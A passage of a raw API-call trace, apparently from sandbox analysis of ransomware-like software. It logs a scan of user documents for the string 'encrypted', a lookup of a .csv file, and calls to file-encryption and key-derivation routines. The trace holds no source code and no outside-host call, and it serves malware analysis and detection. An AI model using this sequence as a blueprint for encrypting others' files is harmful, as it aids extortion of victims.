lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.614] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.614] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0034.614] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.614] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0034.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.614] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.615] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.615] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.615] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.615] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0034.615] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b364200, ftCreationTime.dwHighDateTime=0x1d5c063, ftLastAccessTime.dwLowDateTime=0x8e9b3a70, ftLastAccessTime.dwHighDateTime=0x1d5bff8, ftLastWriteTime.dwLowDateTime=0x8e9b3a70, ftLastWriteTime.dwHighDateTime=0x1d5bff8, nFileSizeHigh=0x0, nFileSizeLow=0x158e5, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="NC9n Uj.csv", cAlternateFileName="NC9NUJ~1.CSV")) returned 0x7c2100 [0034.615] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.615] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.615] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.616] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.616] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0034.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0034.616] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.616] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.616] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0034.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.616] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0034.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.617] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0034.617] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.617] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.617] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.618] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.618] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0034.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.618] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.618] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.618] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.618] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 